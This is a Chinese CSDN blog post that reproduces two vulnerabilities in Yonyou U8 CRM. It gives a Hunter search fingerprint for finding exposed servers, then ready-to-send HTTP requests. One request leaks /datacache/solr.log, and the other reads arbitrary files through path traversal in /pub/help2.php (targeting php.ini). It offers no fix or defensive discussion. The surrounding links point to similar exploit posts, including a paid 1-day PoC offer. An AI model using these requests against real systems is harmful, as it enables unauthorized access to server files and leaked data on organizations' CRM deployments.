用友U8CRM存在信息泄露+文件读取漏洞

最新推荐文章于 2024-06-18 02:30:07 发布
最新推荐文章于 2024-06-18 02:30:07 发布
阅读量577 收藏 8
点赞数 11
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waxcj/article/details/135363025
版权

1:指纹特征

Hunter:app.name="用友 CRM"

2:漏洞复现

GET /datacache/solr.log HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述

3:任意文件读取漏洞复现

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述

LZsec
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
用友U8 CRM客户关系管理任意文件上传漏洞复现【附POC】
薛定谔嘚喵博客
09-27 270
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。 用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2583
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1830
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友 U8+CRM V13-V16.5 任意文件读取漏洞
WuYSec的博客
06-14 429
用友U8 CRM 客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友U8 CRM 客户关系管理系统存在任意文件读取漏洞。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。此漏洞影响 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。app="用友-U8CRM" || title="用友U8CRM"
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
最新发布
凝聚力安全团队
06-18 317
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
用友U8 crm客户关系管理存在任意文件上传漏洞
holyxp的博客
09-27 527
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
【复现】用友u8CRM 日志信息泄露 漏洞_12
fushuang333的博客
01-08 638
【复现】用友u8CRM 日志信息泄露,U8是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
最新的用友U8+V16.0全产品报价单.xlsx
09-25
最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,
用友U8+标准介绍.ppt
03-22
用友U8+标准介绍.ppt
用友账套数据文件信息读取.exe
04-15
账套数据文件信息读取.exe
用友U8CRM后台维护以及打印模板设置操作手册
06-28
专注于用友软件的使用服务,以及问题处理,该手册为工作中个人编写,分享给大家,共同学习使用。
用友U8启用货位管理操作步骤
08-25
本操作说明适用于用友U810.0以上版本,请注意认真阅读,特别是最后的注意事项。货位管理和批次管理相冲突,请谨慎启用,生厂制造类企业建议先模拟用友启用货位管理后再确定是否启用。
用友U8+ CRM任意文件上传、任意文件读取 实战
m0_43397796的博客
02-24 2041
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞
【复现】用友u8CRM 存在信息泄露漏洞_06
fushuang333的博客
01-02 602
【复现】用友u8CRM 存在信息泄露漏洞用户信息泄露,可能会对生活造成影响,甚至财产受到损失。
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1273
用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友U8 CRM系统help2 任意文件读取漏洞(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 602
U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度,以“整合、专业、智能、畅捷”为产品研发理念,弥补了代理销售服务行业信息化管理的空白,为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构,支持 SQL Server数据库,支持Chrome、 Firefox等各种主流浏览器应用。
用友U8+ CRM任意文件上传漏洞
weixin_44304678的博客
11-02 434
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1263
用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值